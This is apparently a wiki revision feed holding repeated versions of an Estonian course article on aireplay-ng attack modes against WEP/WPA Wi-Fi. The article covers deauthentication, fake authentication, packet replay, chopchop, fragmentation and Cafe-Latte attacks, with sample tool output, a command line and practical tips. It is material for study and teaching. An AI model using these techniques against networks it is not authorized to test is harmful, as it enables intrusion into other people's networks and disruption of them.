[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
\[\[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=30974</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=30974"/>
		<updated>2011-05-10T10:27:03Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Teooria */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile &#039;&#039;random&#039;&#039; baidijada(ülesanne).[6]&lt;br /&gt;
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendub võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP&#039;le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite pealkrijade ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta &#039;&#039;broadcastis&#039;&#039;.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP &#039;&#039;cache&#039;&#039; tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
12:35:25  Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud &#039;&#039;versus&#039;&#039; broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
15:49:32  Sending DeAuth to broadcast -- BSSID: [00:14:6C:7E:40:80]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nagu mainitud, &#039;&#039;broadcast&#039;&#039; lahtiühendamine on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.&lt;br /&gt;
&amp;lt;pre&amp;gt;15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA &#039;&#039;handshake&#039;&#039; paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud &#039;&#039;handshake&#039;&#039;`id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi plaintekst väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada) et luu abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või rejectitakse. Iga saadetud pakk baseerub arvatava baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; .........&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0201-191706.cap&lt;br /&gt;
 Saving keystream in replay_dec-0201-191706.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine broadcasti ilma autentimata. Soovitatav on võtta ka lühem pakett kuna deükrptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab proigramm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagstatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Saving chosen packet in replay_src-0124-161120.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0124-161129.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab custom pakette injectida. Muidugi on vajalik assotsitud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - AP ei pea selles etapis tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki integrity kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 target IP ja target MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib target MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub source IP - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
Valiidse ARP päringu saatmiseks kliendile peame liigutama source IP positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks incoming source IP positsioonile 33. Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
IP Paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks bit-flippingut. Sama meetodit kasutatakse ka ARP paketi source MAC&#039;i muutmiseks juhul kui seal on algselt multicast.[15]&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
\[\[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=30973</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=30973"/>
		<updated>2011-05-10T10:23:17Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Rünnak 1: Fake authentication */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
